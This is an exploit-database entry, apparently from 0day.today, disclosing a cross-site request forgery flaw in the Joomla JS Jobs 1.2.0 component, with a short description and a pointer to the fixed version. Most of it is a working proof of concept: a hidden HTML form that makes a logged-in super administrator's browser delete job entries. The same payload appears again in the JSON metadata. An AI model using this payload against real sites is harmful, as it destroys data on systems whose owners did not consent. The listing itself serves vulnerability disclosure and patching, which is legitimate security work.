Search...

Joomla JS Jobs 1.2.0 Component - Cross-Site Request Forgery Vulnerability

2018-04-18T00:00:00

ID 1337DAY-ID-30201
Type zdt
Reporter Sureshbabu Narvaneni
Modified 2018-04-18T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            #######################################
# Exploit Title: Joomla! Component Js Jobs - Multiple Cross Site Request Forgery Vulnerabilities
# Google Dork: N/A
# Date: 17-04-2018
#######################################
# Exploit Author: Sureshbabu Narvaneni#
#######################################
# Author Blog : http://nullnews.in
# Vendor Homepage: https://www.joomsky.com
# Software Link: https://extensions.joomla.org/extension/js-jobs/
# Affected Version: 1.2.0
# Category: WebApps
# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
# CVE : NA
#######################################
 
1. Vendor Description:
 
JS Jobs for any business, industry body or staffing company wishing to
establish a presence on the internet. JS Jobs allows you to run your own,
unique jobs classifieds service where you or employer can advertise their
jobs and job seekers can upload their Resumes.
 
2. Technical Description:
 
The state changing actions in JS Jobs before 1.2.1 not having any random
token validation which results in Cross Site Request Forgery Vulnerability.
 
3. Proof of Concept:
 
Delete Job Entry [Super Admin Access]
 
&lt;html&gt;
  &lt;body&gt;
  &lt;script&gt;history.pushState('', '', '/')&lt;/script&gt;
    &lt;form action="http://[URL]/joomla/administrator/index.php"
method="POST"&gt;
      &lt;input type="hidden" name="js&#95;sortby" value="0" /&gt;
      &lt;input type="hidden" name="companyname" value="" /&gt;
      &lt;input type="hidden" name="jobtitle" value="" /&gt;
      &lt;input type="hidden" name="location" value="" /&gt;
      &lt;input type="hidden" name="jobcategory" value="" /&gt;
      &lt;input type="hidden" name="jobtype" value="" /&gt;
      &lt;input type="hidden" name="datefrom" value="" /&gt;
      &lt;input type="hidden" name="dateto" value="" /&gt;
      &lt;input type="hidden" name="status" value="" /&gt;
      &lt;input type="hidden" name="cid&#91;&#93;" value="[Job ID]" /&gt;
      &lt;input type="hidden" name="limit" value="20" /&gt;
      &lt;input type="hidden" name="limitstart" value="0" /&gt;
      &lt;input type="hidden" name="option" value="com&#95;jsjobs" /&gt;
      &lt;input type="hidden" name="task" value="job&#46;jobenforcedelete" /&gt;
      &lt;input type="hidden" name="c" value="job" /&gt;
      &lt;input type="hidden" name="view" value="job" /&gt;
      &lt;input type="hidden" name="layout" value="jobs" /&gt;
      &lt;input type="hidden" name="callfrom" value="jobs" /&gt;
      &lt;input type="hidden" name="boxchecked" value="1" /&gt;
      &lt;input type="hidden" name="sortby" value="asc" /&gt;
      &lt;input type="hidden" name="my&#95;click" value="" /&gt;
      &lt;input type="submit" value="Submit request" /&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;
 
4. Solution:
 
Update to latest version
 
https://extensions.joomla.org/extension/js-jobs/

#  0day.today [2018-04-20]  #

JSON Vulners Source

Initial Source

{"edition": 1, "title": "Joomla JS Jobs 1.2.0 Component - Cross-Site Request Forgery Vulnerability", "bulletinFamily": "exploit", "published": "2018-04-18T00:00:00", "lastseen": "2018-04-20T19:55:48", "modified": "2018-04-18T00:00:00", "reporter": "Sureshbabu Narvaneni", "viewCount": 8, "sourceHref": "https://0day.today/exploit/30201", "href": "https://0day.today/exploit/description/30201", "description": "Exploit for php platform in category web applications", "type": "zdt", "references": [], "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2018-04-20T19:55:48", "rev": 2}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13507"]}], "modified": "2018-04-20T19:55:48", "rev": 2}, "vulnersScore": 0.4}, "sourceData": "#######################################\r\n# Exploit Title: Joomla! Component Js Jobs - Multiple Cross Site Request Forgery Vulnerabilities\r\n# Google Dork: N/A\r\n# Date: 17-04-2018\r\n#######################################\r\n# Exploit Author: Sureshbabu Narvaneni#\r\n#######################################\r\n# Author Blog : http://nullnews.in\r\n# Vendor Homepage: https://www.joomsky.com\r\n# Software Link: https://extensions.joomla.org/extension/js-jobs/\r\n# Affected Version: 1.2.0\r\n# Category: WebApps\r\n# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686\r\n# CVE : NA\r\n#######################################\r\n \r\n1. Vendor Description:\r\n \r\nJS Jobs for any business, industry body or staffing company wishing to\r\nestablish a presence on the internet. JS Jobs allows you to run your own,\r\nunique jobs classifieds service where you or employer can advertise their\r\njobs and job seekers can upload their Resumes.\r\n \r\n2. Technical Description:\r\n \r\nThe state changing actions in JS Jobs before 1.2.1 not having any random\r\ntoken validation which results in Cross Site Request Forgery Vulnerability.\r\n \r\n3. Proof of Concept:\r\n \r\nDelete Job Entry [Super Admin Access]\r\n \r\n<html>\r\n <body>\r\n <script>history.pushState('', '', '/')</script>\r\n <form action=\"http://[URL]/joomla/administrator/index.php\"\r\nmethod=\"POST\">\r\n <input type=\"hidden\" name=\"js_sortby\" value=\"0\" />\r\n <input type=\"hidden\" name=\"companyname\" value=\"\" />\r\n <input type=\"hidden\" name=\"jobtitle\" value=\"\" />\r\n <input type=\"hidden\" name=\"location\" value=\"\" />\r\n <input type=\"hidden\" name=\"jobcategory\" value=\"\" />\r\n <input type=\"hidden\" name=\"jobtype\" value=\"\" />\r\n <input type=\"hidden\" name=\"datefrom\" value=\"\" />\r\n <input type=\"hidden\" name=\"dateto\" value=\"\" />\r\n <input type=\"hidden\" name=\"status\" value=\"\" />\r\n <input type=\"hidden\" name=\"cid[]\" value=\"[Job ID]\" />\r\n <input type=\"hidden\" name=\"limit\" value=\"20\" />\r\n <input type=\"hidden\" name=\"limitstart\" value=\"0\" />\r\n <input type=\"hidden\" name=\"option\" value=\"com_jsjobs\" />\r\n <input type=\"hidden\" name=\"task\" value=\"job.jobenforcedelete\" />\r\n <input type=\"hidden\" name=\"c\" value=\"job\" />\r\n <input type=\"hidden\" name=\"view\" value=\"job\" />\r\n <input type=\"hidden\" name=\"layout\" value=\"jobs\" />\r\n <input type=\"hidden\" name=\"callfrom\" value=\"jobs\" />\r\n <input type=\"hidden\" name=\"boxchecked\" value=\"1\" />\r\n <input type=\"hidden\" name=\"sortby\" value=\"asc\" />\r\n <input type=\"hidden\" name=\"my_click\" value=\"\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\r\n \r\n4. Solution:\r\n \r\nUpdate to latest version\r\n \r\nhttps://extensions.joomla.org/extension/js-jobs/\n\n# 0day.today [2018-04-20] #", "cvss": {"vector": "NONE", "score": 0.0}, "cvelist": [], "id": "1337DAY-ID-30201", "immutableFields": []}